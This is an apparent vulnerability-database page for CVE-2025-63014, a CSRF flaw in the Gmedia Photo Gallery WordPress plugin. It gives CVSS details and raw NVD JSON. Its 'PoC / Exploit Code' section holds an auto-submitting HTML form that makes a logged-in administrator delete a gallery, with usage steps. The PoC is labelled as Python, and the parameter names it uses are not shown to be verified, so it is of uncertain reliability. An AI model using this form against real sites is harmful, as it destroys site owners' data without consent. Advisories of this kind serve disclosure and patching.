Security Vulnerability Report
中文
CVE-2025-63014 CVSS 4.3 MEDIUM

CVE-2025-63014

Published: 2025-12-31 16:15:48
Last Modified: 2026-04-23 15:34:57

Description

Cross-Site Request Forgery (CSRF) vulnerability in Serhii Pasyuk Gmedia Photo Gallery grand-media allows Cross Site Request Forgery.This issue affects Gmedia Photo Gallery: from n/a through <= 1.25.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Gmedia Photo Gallery (grand-media) <= 1.25.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-63014 CSRF PoC for Gmedia Photo Gallery --> <!-- This PoC demonstrates the CSRF vulnerability in Gmedia Photo Gallery <= 1.25.0 --> <!-- It triggers a delete action on gallery with ID 1 --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - Gmedia Photo Gallery</title> <style> body { font-family: Arial, sans-serif; padding: 20px; } .malicious-form { display: none; } .info { background: #f0f0f0; padding: 10px; margin: 10px 0; } </style> </head> <body> <div class="info"> <h2>CVE-2025-63014 PoC</h2> <p>This page demonstrates the CSRF vulnerability in Gmedia Photo Gallery plugin.</p> <p>When the page loads, it will automatically submit a malicious request to delete gallery ID 1.</p> </div> <!-- Malicious form that auto-submits --> <form class="malicious-form" id="csrfForm" action="[TARGET_WEBSITE]/wp-admin/admin.php?page=grand-media" method="POST" target="_blank"> <!-- Security token bypass attempt (if token is missing or weak) --> <input type="hidden" name="action" value="gmedia_delete"> <input type="hidden" name="gmedia_ids[]" value="1"> <input type="hidden" name="delete" value="1"> </form> <script> // Auto-submit the form when page loads window.onload = function() { console.log('CSRF PoC loaded - submitting malicious request...'); document.getElementById('csrfForm').submit(); }; </script> <div class="info"> <p><strong>Note:</strong> This PoC is for educational and security testing purposes only.</p> <p>To test this vulnerability:</p> <ol> <li>Replace [TARGET_WEBSITE] with the actual WordPress site URL</li> <li>Ensure Gmedia Photo Gallery plugin (<= 1.25.0) is installed</li> <li>Login as WordPress administrator</li> <li>Open this PoC page</li> <li>Observe that gallery deletion request is sent without proper CSRF validation</li> </ol> </div> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63014", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:47.773", "lastModified": "2026-04-23T15:34:57.453", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Serhii Pasyuk Gmedia Photo Gallery grand-media allows Cross Site Request Forgery.This issue affects Gmedia Photo Gallery: from n/a through <= 1.25.0."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Serhii Pasyuk Gmedia Photo Gallery permite la falsificación de petición en sitios cruzados. Este problema afecta a Gmedia Photo Gallery: desde n/a hasta 1.24.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/grand-media/vulnerability/wordpress-gmedia-photo-gallery-plugin-1-24-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}